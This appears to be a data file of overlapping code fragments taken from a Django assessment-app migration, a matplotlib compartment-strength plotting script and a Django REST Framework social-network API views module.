message :param result : the boolean object indicating if the url is", "msg, result=False): \"\"\" Handles the message and report it back to console :param" ]
[ "('assessment', '0007_answer_is_correct_choice'), ] operations = [ migrations.RemoveField( model_name='question', name='correct_choices', ), migrations.AddField( model_name='assessment', name='multi_times',", "model_name='score', name='assessment_score', field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19), ), migrations.AlterField( model_name='score', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ),", "model_name='question', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='question', name='mark', field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19), ),", "by Django 2.1.4 on 2019-01-25 12:49 import datetime import django.contrib.postgres.fields.jsonb from django.db import", "Generated by Django 2.1.4 on 2019-01-25 12:49 import datetime import django.contrib.postgres.fields.jsonb from django.db", "model_name='answer', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='assessment', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ),", "model_name='score', name='history', field=django.contrib.postgres.fields.jsonb.JSONField(default={}), ), migrations.AlterField( model_name='answer', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='assessment',", "migrations.RemoveField( model_name='question', name='correct_choices', ), migrations.AddField( model_name='assessment', name='multi_times', field=models.BooleanField(default=False), ), migrations.AddField( model_name='score', name='history', field=django.contrib.postgres.fields.jsonb.JSONField(default={}),", "25)), ), migrations.AlterField( model_name='assessment', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='question', name='created_at', field=models.DateField(default=datetime.date(2019,", "name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='question', name='mark', field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19), ), migrations.AlterField(", "django.contrib.postgres.fields.jsonb from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('assessment', '0007_answer_is_correct_choice'),", "default=0.0, max_digits=19), ), migrations.AlterField( model_name='score', name='assessment_score', field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19), ), migrations.AlterField( model_name='score', name='created_at',", "model_name='assessment', name='multi_times', field=models.BooleanField(default=False), ), migrations.AddField( model_name='score', name='history', field=django.contrib.postgres.fields.jsonb.JSONField(default={}), ), migrations.AlterField( model_name='answer', name='created_at', field=models.DateField(default=datetime.date(2019,", "name='mark', field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19), ), migrations.AlterField( model_name='score', name='assessment_score', field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19), ), migrations.AlterField(", "), migrations.AlterField( model_name='question', name='mark', field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19), ), migrations.AlterField( model_name='score', name='assessment_score', field=models.DecimalField(decimal_places=10, default=0.0,", "[ migrations.RemoveField( model_name='question', name='correct_choices', ), migrations.AddField( model_name='assessment', name='multi_times', field=models.BooleanField(default=False), ), migrations.AddField( model_name='score', name='history',", "datetime import django.contrib.postgres.fields.jsonb from django.db import migrations, models class Migration(migrations.Migration): dependencies = [", "1, 25)), ), migrations.AlterField( model_name='question', name='mark', field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19), ), migrations.AlterField( model_name='score', name='assessment_score',", "name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='assessment', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField(", "dependencies = [ ('assessment', '0007_answer_is_correct_choice'), ] operations = [ migrations.RemoveField( model_name='question', name='correct_choices', ),", "'0007_answer_is_correct_choice'), ] operations = [ migrations.RemoveField( model_name='question', name='correct_choices', ), migrations.AddField( model_name='assessment', name='multi_times', field=models.BooleanField(default=False),", "field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19), ), migrations.AlterField( model_name='score', name='assessment_score', field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19), ), migrations.AlterField( model_name='score',", "name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='question', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField(", "field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='question', name='mark', field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19), ), migrations.AlterField( model_name='score',", "default=0.0, max_digits=19), ), migrations.AlterField( model_name='score', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='score', name='status',", "name='correct_choices', ), migrations.AddField( model_name='assessment', name='multi_times', field=models.BooleanField(default=False), ), migrations.AddField( model_name='score', name='history', field=django.contrib.postgres.fields.jsonb.JSONField(default={}), ), migrations.AlterField(", "from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('assessment', '0007_answer_is_correct_choice'), ]", "migrations.AlterField( model_name='score', name='assessment_score', field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19), ), migrations.AlterField( model_name='score', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)),", "), migrations.AlterField( model_name='assessment', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='question', name='created_at', field=models.DateField(default=datetime.date(2019, 1,", "), migrations.AlterField( model_name='score', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='score', name='status', field=models.CharField(blank=True, default='started',", "migrations.AlterField( model_name='answer', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='assessment', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)),", "max_digits=19), ), migrations.AlterField( model_name='score', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='score', name='status', field=models.CharField(blank=True,", "2019-01-25 12:49 import datetime import django.contrib.postgres.fields.jsonb from django.db import migrations, models class Migration(migrations.Migration):", "12:49 import datetime import django.contrib.postgres.fields.jsonb from django.db import migrations, models class Migration(migrations.Migration): dependencies", "models class Migration(migrations.Migration): dependencies = [ ('assessment', '0007_answer_is_correct_choice'), ] operations = [ migrations.RemoveField(", "), migrations.AlterField( model_name='answer', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='assessment', name='created_at', field=models.DateField(default=datetime.date(2019, 1,", "migrations, models class Migration(migrations.Migration): dependencies = [ ('assessment', '0007_answer_is_correct_choice'), ] operations = [", "1, 25)), ), migrations.AlterField( model_name='question', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='question', name='mark',", "Django 2.1.4 on 2019-01-25 12:49 import datetime import django.contrib.postgres.fields.jsonb from django.db import migrations,", "migrations.AddField( model_name='assessment', name='multi_times', field=models.BooleanField(default=False), ), migrations.AddField( model_name='score', name='history', field=django.contrib.postgres.fields.jsonb.JSONField(default={}), ), migrations.AlterField( model_name='answer', name='created_at',", "migrations.AlterField( model_name='question', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='question', name='mark', field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19),", "field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19), ), migrations.AlterField( model_name='score', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='score',", "# Generated by Django 2.1.4 on 2019-01-25 12:49 import datetime import django.contrib.postgres.fields.jsonb from", "] operations = [ migrations.RemoveField( model_name='question', name='correct_choices', ), migrations.AddField( model_name='assessment', name='multi_times', field=models.BooleanField(default=False), ),", "max_digits=19), ), migrations.AlterField( model_name='score', name='assessment_score', field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19), ), migrations.AlterField( model_name='score', name='created_at', field=models.DateField(default=datetime.date(2019,", "model_name='question', name='correct_choices', ), migrations.AddField( model_name='assessment', name='multi_times', field=models.BooleanField(default=False), ), migrations.AddField( model_name='score', name='history', field=django.contrib.postgres.fields.jsonb.JSONField(default={}), ),", "= [ ('assessment', '0007_answer_is_correct_choice'), ] operations = [ migrations.RemoveField( model_name='question', name='correct_choices', ), migrations.AddField(", "), migrations.AlterField( model_name='score', name='assessment_score', field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19), ), migrations.AlterField( model_name='score', name='created_at', field=models.DateField(default=datetime.date(2019, 1,", "2.1.4 on 2019-01-25 12:49 import datetime import django.contrib.postgres.fields.jsonb from django.db import migrations, models", "25)), ), migrations.AlterField( model_name='question', name='mark', field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19), ), migrations.AlterField( model_name='score', name='assessment_score', field=models.DecimalField(decimal_places=10,", "class Migration(migrations.Migration): dependencies = [ ('assessment', '0007_answer_is_correct_choice'), ] operations = [ migrations.RemoveField( model_name='question',", "25)), ), migrations.AlterField( model_name='question', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='question', name='mark', field=models.DecimalField(decimal_places=10,", "import datetime import django.contrib.postgres.fields.jsonb from django.db import migrations, models class Migration(migrations.Migration): dependencies =", "operations = [ migrations.RemoveField( model_name='question', name='correct_choices', ), migrations.AddField( model_name='assessment', name='multi_times', field=models.BooleanField(default=False), ), migrations.AddField(", "), migrations.AddField( model_name='assessment', name='multi_times', field=models.BooleanField(default=False), ), migrations.AddField( model_name='score', name='history', field=django.contrib.postgres.fields.jsonb.JSONField(default={}), ), migrations.AlterField( model_name='answer',", "name='history', field=django.contrib.postgres.fields.jsonb.JSONField(default={}), ), migrations.AlterField( model_name='answer', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='assessment', name='created_at',", "), migrations.AlterField( model_name='question', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='question', name='mark', field=models.DecimalField(decimal_places=10, default=0.0,", "[ ('assessment', '0007_answer_is_correct_choice'), ] operations = [ migrations.RemoveField( model_name='question', name='correct_choices', ), migrations.AddField( model_name='assessment',", "1, 25)), ), migrations.AlterField( model_name='assessment', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='question', name='created_at',", "migrations.AlterField( model_name='question', name='mark', field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19), ), migrations.AlterField( model_name='score', name='assessment_score', field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19),", "name='multi_times', field=models.BooleanField(default=False), ), migrations.AddField( model_name='score', name='history', field=django.contrib.postgres.fields.jsonb.JSONField(default={}), ), migrations.AlterField( model_name='answer', name='created_at', field=models.DateField(default=datetime.date(2019, 1,", "migrations.AlterField( model_name='assessment', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='question', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)),", "field=models.BooleanField(default=False), ), migrations.AddField( model_name='score', name='history', field=django.contrib.postgres.fields.jsonb.JSONField(default={}), ), migrations.AlterField( model_name='answer', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)),", "migrations.AddField( model_name='score', name='history', field=django.contrib.postgres.fields.jsonb.JSONField(default={}), ), migrations.AlterField( model_name='answer', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField(", "model_name='question', name='mark', field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19), ), migrations.AlterField( model_name='score', name='assessment_score', field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19), ),", "model_name='score', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='score', name='status', field=models.CharField(blank=True, default='started', max_length=250), ),", "model_name='assessment', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='question', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ),", "name='assessment_score', field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19), ), migrations.AlterField( model_name='score', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField(", "field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='question', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='question',", "django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('assessment', '0007_answer_is_correct_choice'), ] operations", "import migrations, models class Migration(migrations.Migration): dependencies = [ ('assessment', '0007_answer_is_correct_choice'), ] operations =", "import django.contrib.postgres.fields.jsonb from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('assessment',", "), migrations.AddField( model_name='score', name='history', field=django.contrib.postgres.fields.jsonb.JSONField(default={}), ), migrations.AlterField( model_name='answer', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ),", "Migration(migrations.Migration): dependencies = [ ('assessment', '0007_answer_is_correct_choice'), ] operations = [ migrations.RemoveField( model_name='question', name='correct_choices',", "= [ migrations.RemoveField( model_name='question', name='correct_choices', ), migrations.AddField( model_name='assessment', name='multi_times', field=models.BooleanField(default=False), ), migrations.AddField( model_name='score',", "field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='assessment', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='question',", "name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='score', name='status', field=models.CharField(blank=True, default='started', max_length=250), ), ]", "on 2019-01-25 12:49 import datetime import django.contrib.postgres.fields.jsonb from django.db import migrations, models class", "migrations.AlterField( model_name='score', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='score', name='status', field=models.CharField(blank=True, default='started', max_length=250),", "field=django.contrib.postgres.fields.jsonb.JSONField(default={}), ), migrations.AlterField( model_name='answer', name='created_at', field=models.DateField(default=datetime.date(2019, 1, 25)), ), migrations.AlterField( model_name='assessment', name='created_at', field=models.DateField(default=datetime.date(2019," ]
[ "structs)] all_comps = [ca.get_compartments(mat) for mat in mats] all_gen_coords = [struct.getGenCoords() for struct", "in paths] mats = [dt.matFromBed(path, struct) for path, struct in zip(paths, structs)] all_comps", "<filename>scripts/plot_compartment_strength.py from matplotlib import pyplot as plt import sys sys.path.append(\"..\") import compartment_analysis as", "#all_comps[len(all_comps)-1] = -all_comps[len(all_comps)-1] for gen_coords, comps, prefix in zip(all_gen_coords, all_comps, prefixes): plt.plot(gen_coords, comps,", "sys sys.path.append(\"..\") import compartment_analysis as ca import data_tools as dt import os paths", "from matplotlib import pyplot as plt import sys sys.path.append(\"..\") import compartment_analysis as ca", "in paths] structs = [dt.structureFromBed(path) for path in paths] mats = [dt.matFromBed(path, struct)", "path, struct in zip(paths, structs)] all_comps = [ca.get_compartments(mat) for mat in mats] all_gen_coords", "in mats] all_gen_coords = [struct.getGenCoords() for struct in structs] #all_comps[len(all_comps)-1] = -all_comps[len(all_comps)-1] for", "os paths = sys.argv[1:len(sys.argv)] prefixes = [os.path.basename(path) for path in paths] structs =", "paths] structs = [dt.structureFromBed(path) for path in paths] mats = [dt.matFromBed(path, struct) for", "for path in paths] mats = [dt.matFromBed(path, struct) for path, struct in zip(paths,", "all_gen_coords = [struct.getGenCoords() for struct in structs] #all_comps[len(all_comps)-1] = -all_comps[len(all_comps)-1] for gen_coords, comps,", "= -all_comps[len(all_comps)-1] for gen_coords, comps, prefix in zip(all_gen_coords, all_comps, prefixes): plt.plot(gen_coords, comps, label=prefix)", "for mat in mats] all_gen_coords = [struct.getGenCoords() for struct in structs] #all_comps[len(all_comps)-1] =", "= sys.argv[1:len(sys.argv)] prefixes = [os.path.basename(path) for path in paths] structs = [dt.structureFromBed(path) for", "for path in paths] structs = [dt.structureFromBed(path) for path in paths] mats =", "plt import sys sys.path.append(\"..\") import compartment_analysis as ca import data_tools as dt import", "import os paths = sys.argv[1:len(sys.argv)] prefixes = [os.path.basename(path) for path in paths] structs", "mat in mats] all_gen_coords = [struct.getGenCoords() for struct in structs] #all_comps[len(all_comps)-1] = -all_comps[len(all_comps)-1]", "-all_comps[len(all_comps)-1] for gen_coords, comps, prefix in zip(all_gen_coords, all_comps, prefixes): plt.plot(gen_coords, comps, label=prefix) plt.legend()", "for path, struct in zip(paths, structs)] all_comps = [ca.get_compartments(mat) for mat in mats]", "in zip(paths, structs)] all_comps = [ca.get_compartments(mat) for mat in mats] all_gen_coords = [struct.getGenCoords()", "struct in zip(paths, structs)] all_comps = [ca.get_compartments(mat) for mat in mats] all_gen_coords =", "struct) for path, struct in zip(paths, structs)] all_comps = [ca.get_compartments(mat) for mat in", "[ca.get_compartments(mat) for mat in mats] all_gen_coords = [struct.getGenCoords() for struct in structs] #all_comps[len(all_comps)-1]", "for struct in structs] #all_comps[len(all_comps)-1] = -all_comps[len(all_comps)-1] for gen_coords, comps, prefix in zip(all_gen_coords,", "as plt import sys sys.path.append(\"..\") import compartment_analysis as ca import data_tools as dt", "prefixes = [os.path.basename(path) for path in paths] structs = [dt.structureFromBed(path) for path in", "structs = [dt.structureFromBed(path) for path in paths] mats = [dt.matFromBed(path, struct) for path,", "compartment_analysis as ca import data_tools as dt import os paths = sys.argv[1:len(sys.argv)] prefixes", "mats = [dt.matFromBed(path, struct) for path, struct in zip(paths, structs)] all_comps = [ca.get_compartments(mat)", "as dt import os paths = sys.argv[1:len(sys.argv)] prefixes = [os.path.basename(path) for path in", "ca import data_tools as dt import os paths = sys.argv[1:len(sys.argv)] prefixes = [os.path.basename(path)", "pyplot as plt import sys sys.path.append(\"..\") import compartment_analysis as ca import data_tools as", "struct in structs] #all_comps[len(all_comps)-1] = -all_comps[len(all_comps)-1] for gen_coords, comps, prefix in zip(all_gen_coords, all_comps,", "in structs] #all_comps[len(all_comps)-1] = -all_comps[len(all_comps)-1] for gen_coords, comps, prefix in zip(all_gen_coords, all_comps, prefixes):", "= [os.path.basename(path) for path in paths] structs = [dt.structureFromBed(path) for path in paths]", "import pyplot as plt import sys sys.path.append(\"..\") import compartment_analysis as ca import data_tools", "matplotlib import pyplot as plt import sys sys.path.append(\"..\") import compartment_analysis as ca import", "zip(paths, structs)] all_comps = [ca.get_compartments(mat) for mat in mats] all_gen_coords = [struct.getGenCoords() for", "sys.path.append(\"..\") import compartment_analysis as ca import data_tools as dt import os paths =", "as ca import data_tools as dt import os paths = sys.argv[1:len(sys.argv)] prefixes =", "paths] mats = [dt.matFromBed(path, struct) for path, struct in zip(paths, structs)] all_comps =", "structs] #all_comps[len(all_comps)-1] = -all_comps[len(all_comps)-1] for gen_coords, comps, prefix in zip(all_gen_coords, all_comps, prefixes): plt.plot(gen_coords,", "for gen_coords, comps, prefix in zip(all_gen_coords, all_comps, prefixes): plt.plot(gen_coords, comps, label=prefix) plt.legend() plt.show()", "[os.path.basename(path) for path in paths] structs = [dt.structureFromBed(path) for path in paths] mats", "import sys sys.path.append(\"..\") import compartment_analysis as ca import data_tools as dt import os", "paths = sys.argv[1:len(sys.argv)] prefixes = [os.path.basename(path) for path in paths] structs = [dt.structureFromBed(path)", "[dt.structureFromBed(path) for path in paths] mats = [dt.matFromBed(path, struct) for path, struct in", "[dt.matFromBed(path, struct) for path, struct in zip(paths, structs)] all_comps = [ca.get_compartments(mat) for mat", "= [dt.structureFromBed(path) for path in paths] mats = [dt.matFromBed(path, struct) for path, struct", "[struct.getGenCoords() for struct in structs] #all_comps[len(all_comps)-1] = -all_comps[len(all_comps)-1] for gen_coords, comps, prefix in", "path in paths] mats = [dt.matFromBed(path, struct) for path, struct in zip(paths, structs)]", "= [struct.getGenCoords() for struct in structs] #all_comps[len(all_comps)-1] = -all_comps[len(all_comps)-1] for gen_coords, comps, prefix", "= [dt.matFromBed(path, struct) for path, struct in zip(paths, structs)] all_comps = [ca.get_compartments(mat) for", "path in paths] structs = [dt.structureFromBed(path) for path in paths] mats = [dt.matFromBed(path,", "= [ca.get_compartments(mat) for mat in mats] all_gen_coords = [struct.getGenCoords() for struct in structs]", "import compartment_analysis as ca import data_tools as dt import os paths = sys.argv[1:len(sys.argv)]", "data_tools as dt import os paths = sys.argv[1:len(sys.argv)] prefixes = [os.path.basename(path) for path", "sys.argv[1:len(sys.argv)] prefixes = [os.path.basename(path) for path in paths] structs = [dt.structureFromBed(path) for path", "import data_tools as dt import os paths = sys.argv[1:len(sys.argv)] prefixes = [os.path.basename(path) for", "mats] all_gen_coords = [struct.getGenCoords() for struct in structs] #all_comps[len(all_comps)-1] = -all_comps[len(all_comps)-1] for gen_coords,", "all_comps = [ca.get_compartments(mat) for mat in mats] all_gen_coords = [struct.getGenCoords() for struct in", "dt import os paths = sys.argv[1:len(sys.argv)] prefixes = [os.path.basename(path) for path in paths]" ]
[]
[ "'profiles': reverse('profile-list', request=request, format=format), 'posts': reverse('post-list', request=request, format=format) }) class ProfileViewSet(viewsets.ReadOnlyModelViewSet): \"\"\"This provides", "self.get_object() if request.method == 'POST': # check if the vote already exists, if", "perform_create(self, serializer): \"\"\"Create a Post associated with the logged-in user.\"\"\" serializer.save(owner=self.request.user.profile) @detail_route(methods=['POST', 'DELETE'],", "or unvote on a post.\"\"\" post = self.get_object() if request.method == 'POST': #", "= Profile.objects.all() serializer_class = ProfileSerializer class PostViewSet(viewsets.ModelViewSet): \"\"\"Get or create Posts. retrieve: Return", "Vote.objects.filter(profile=self.request.user.profile, post=post).exists(): # the user already voted, just return the post directly data", "\"\"\"API views for social_network.\"\"\" from rest_framework import viewsets from rest_framework.decorators import api_view, detail_route", "from rest_framework import viewsets from rest_framework.decorators import api_view, detail_route from rest_framework.response import Response", "get and list functionality for Profiles.\"\"\" queryset = Profile.objects.all() serializer_class = ProfileSerializer class", "list of all Posts. create: Create a new Post as the logged-in user.", "all Posts. create: Create a new Post as the logged-in user. \"\"\" queryset", "directly data = PostSerializer(post, context={'request': self.request}).data return Response(data) new_vote = Vote(profile=self.request.user.profile, post=post) new_vote.save()", "again if Vote.objects.filter(profile=self.request.user.profile, post=post).exists(): # the user already voted, just return the post", "documentation generated by DRF.\"\"\" return Response({ 'profiles': reverse('profile-list', request=request, format=format), 'posts': reverse('post-list', request=request,", "or create Posts. retrieve: Return a post given its ID. list: Get a", "Response(data) new_vote = Vote(profile=self.request.user.profile, post=post) new_vote.save() elif request.method == 'DELETE': Vote.objects.filter(profile=self.request.user.profile, post=post).delete() data", "}) class ProfileViewSet(viewsets.ReadOnlyModelViewSet): \"\"\"This provides get and list functionality for Profiles.\"\"\" queryset =", "serializer): \"\"\"Create a Post associated with the logged-in user.\"\"\" serializer.save(owner=self.request.user.profile) @detail_route(methods=['POST', 'DELETE'], url_path='vote')", "'POST': # check if the vote already exists, if so don't allow the", "PostViewSet(viewsets.ModelViewSet): \"\"\"Get or create Posts. retrieve: Return a post given its ID. list:", "new Post as the logged-in user. \"\"\" queryset = Post.objects.all().order_by('-created') serializer_class = PostSerializer", "a post.\"\"\" post = self.get_object() if request.method == 'POST': # check if the", "Post as the logged-in user. \"\"\" queryset = Post.objects.all().order_by('-created') serializer_class = PostSerializer def", "voted, just return the post directly data = PostSerializer(post, context={'request': self.request}).data return Response(data)", "= ProfileSerializer class PostViewSet(viewsets.ModelViewSet): \"\"\"Get or create Posts. retrieve: Return a post given", "Get a paginated list of all Posts. create: Create a new Post as", "and list functionality for Profiles.\"\"\" queryset = Profile.objects.all() serializer_class = ProfileSerializer class PostViewSet(viewsets.ModelViewSet):", "data = PostSerializer(post, context={'request': self.request}).data return Response(data) new_vote = Vote(profile=self.request.user.profile, post=post) new_vote.save() elif", "paginated list of all Posts. create: Create a new Post as the logged-in", "serializer.save(owner=self.request.user.profile) @detail_route(methods=['POST', 'DELETE'], url_path='vote') def vote(self, request, pk=None): \"\"\"Vote or unvote on a", "def vote(self, request, pk=None): \"\"\"Vote or unvote on a post.\"\"\" post = self.get_object()", "post = self.get_object() if request.method == 'POST': # check if the vote already", "PostSerializer(post, context={'request': self.request}).data return Response(data) new_vote = Vote(profile=self.request.user.profile, post=post) new_vote.save() elif request.method ==", "'DELETE'], url_path='vote') def vote(self, request, pk=None): \"\"\"Vote or unvote on a post.\"\"\" post", "ID. list: Get a paginated list of all Posts. create: Create a new", "ProfileViewSet(viewsets.ReadOnlyModelViewSet): \"\"\"This provides get and list functionality for Profiles.\"\"\" queryset = Profile.objects.all() serializer_class", ".serializers import ProfileSerializer, PostSerializer @api_view(['GET']) def api_root(request, format=None): \"\"\"Root of API, this is", "return Response({ 'profiles': reverse('profile-list', request=request, format=format), 'posts': reverse('post-list', request=request, format=format) }) class ProfileViewSet(viewsets.ReadOnlyModelViewSet):", "logged-in user.\"\"\" serializer.save(owner=self.request.user.profile) @detail_route(methods=['POST', 'DELETE'], url_path='vote') def vote(self, request, pk=None): \"\"\"Vote or unvote", "Profiles.\"\"\" queryset = Profile.objects.all() serializer_class = ProfileSerializer class PostViewSet(viewsets.ModelViewSet): \"\"\"Get or create Posts.", "DRF.\"\"\" return Response({ 'profiles': reverse('profile-list', request=request, format=format), 'posts': reverse('post-list', request=request, format=format) }) class", "class PostViewSet(viewsets.ModelViewSet): \"\"\"Get or create Posts. retrieve: Return a post given its ID.", "user.\"\"\" serializer.save(owner=self.request.user.profile) @detail_route(methods=['POST', 'DELETE'], url_path='vote') def vote(self, request, pk=None): \"\"\"Vote or unvote on", "rest_framework.decorators import api_view, detail_route from rest_framework.response import Response from rest_framework.reverse import reverse from", "a new Post as the logged-in user. \"\"\" queryset = Post.objects.all().order_by('-created') serializer_class =", "new_vote = Vote(profile=self.request.user.profile, post=post) new_vote.save() elif request.method == 'DELETE': Vote.objects.filter(profile=self.request.user.profile, post=post).delete() data =", "generated by DRF.\"\"\" return Response({ 'profiles': reverse('profile-list', request=request, format=format), 'posts': reverse('post-list', request=request, format=format)", "exists, if so don't allow the user to vote again if Vote.objects.filter(profile=self.request.user.profile, post=post).exists():", "as the logged-in user. \"\"\" queryset = Post.objects.all().order_by('-created') serializer_class = PostSerializer def perform_create(self,", "@api_view(['GET']) def api_root(request, format=None): \"\"\"Root of API, this is useful for documentation generated", "a post given its ID. list: Get a paginated list of all Posts.", "post directly data = PostSerializer(post, context={'request': self.request}).data return Response(data) new_vote = Vote(profile=self.request.user.profile, post=post)", "new_vote.save() elif request.method == 'DELETE': Vote.objects.filter(profile=self.request.user.profile, post=post).delete() data = PostSerializer(post, context={'request': self.request}).data return", "create: Create a new Post as the logged-in user. \"\"\" queryset = Post.objects.all().order_by('-created')", "import ProfileSerializer, PostSerializer @api_view(['GET']) def api_root(request, format=None): \"\"\"Root of API, this is useful", "reverse from .models import Profile, Post, Vote from .serializers import ProfileSerializer, PostSerializer @api_view(['GET'])", "already voted, just return the post directly data = PostSerializer(post, context={'request': self.request}).data return", "unvote on a post.\"\"\" post = self.get_object() if request.method == 'POST': # check", "\"\"\"Create a Post associated with the logged-in user.\"\"\" serializer.save(owner=self.request.user.profile) @detail_route(methods=['POST', 'DELETE'], url_path='vote') def", "queryset = Post.objects.all().order_by('-created') serializer_class = PostSerializer def perform_create(self, serializer): \"\"\"Create a Post associated", "if the vote already exists, if so don't allow the user to vote", "social_network.\"\"\" from rest_framework import viewsets from rest_framework.decorators import api_view, detail_route from rest_framework.response import", "post=post) new_vote.save() elif request.method == 'DELETE': Vote.objects.filter(profile=self.request.user.profile, post=post).delete() data = PostSerializer(post, context={'request': self.request}).data", "reverse('profile-list', request=request, format=format), 'posts': reverse('post-list', request=request, format=format) }) class ProfileViewSet(viewsets.ReadOnlyModelViewSet): \"\"\"This provides get", "just return the post directly data = PostSerializer(post, context={'request': self.request}).data return Response(data) new_vote", "this is useful for documentation generated by DRF.\"\"\" return Response({ 'profiles': reverse('profile-list', request=request,", "return Response(data) new_vote = Vote(profile=self.request.user.profile, post=post) new_vote.save() elif request.method == 'DELETE': Vote.objects.filter(profile=self.request.user.profile, post=post).delete()", "the user to vote again if Vote.objects.filter(profile=self.request.user.profile, post=post).exists(): # the user already voted,", "serializer_class = ProfileSerializer class PostViewSet(viewsets.ModelViewSet): \"\"\"Get or create Posts. retrieve: Return a post", "import api_view, detail_route from rest_framework.response import Response from rest_framework.reverse import reverse from .models", "the logged-in user.\"\"\" serializer.save(owner=self.request.user.profile) @detail_route(methods=['POST', 'DELETE'], url_path='vote') def vote(self, request, pk=None): \"\"\"Vote or", "elif request.method == 'DELETE': Vote.objects.filter(profile=self.request.user.profile, post=post).delete() data = PostSerializer(post, context={'request': self.request}).data return Response(data)", "functionality for Profiles.\"\"\" queryset = Profile.objects.all() serializer_class = ProfileSerializer class PostViewSet(viewsets.ModelViewSet): \"\"\"Get or", "list: Get a paginated list of all Posts. create: Create a new Post", "from rest_framework.response import Response from rest_framework.reverse import reverse from .models import Profile, Post,", "from .serializers import ProfileSerializer, PostSerializer @api_view(['GET']) def api_root(request, format=None): \"\"\"Root of API, this", "the vote already exists, if so don't allow the user to vote again", "if Vote.objects.filter(profile=self.request.user.profile, post=post).exists(): # the user already voted, just return the post directly", "serializer_class = PostSerializer def perform_create(self, serializer): \"\"\"Create a Post associated with the logged-in", "import viewsets from rest_framework.decorators import api_view, detail_route from rest_framework.response import Response from rest_framework.reverse", "given its ID. list: Get a paginated list of all Posts. create: Create", "api_view, detail_route from rest_framework.response import Response from rest_framework.reverse import reverse from .models import", "post given its ID. list: Get a paginated list of all Posts. create:", "logged-in user. \"\"\" queryset = Post.objects.all().order_by('-created') serializer_class = PostSerializer def perform_create(self, serializer): \"\"\"Create", "its ID. list: Get a paginated list of all Posts. create: Create a", "user to vote again if Vote.objects.filter(profile=self.request.user.profile, post=post).exists(): # the user already voted, just", "def perform_create(self, serializer): \"\"\"Create a Post associated with the logged-in user.\"\"\" serializer.save(owner=self.request.user.profile) @detail_route(methods=['POST',", 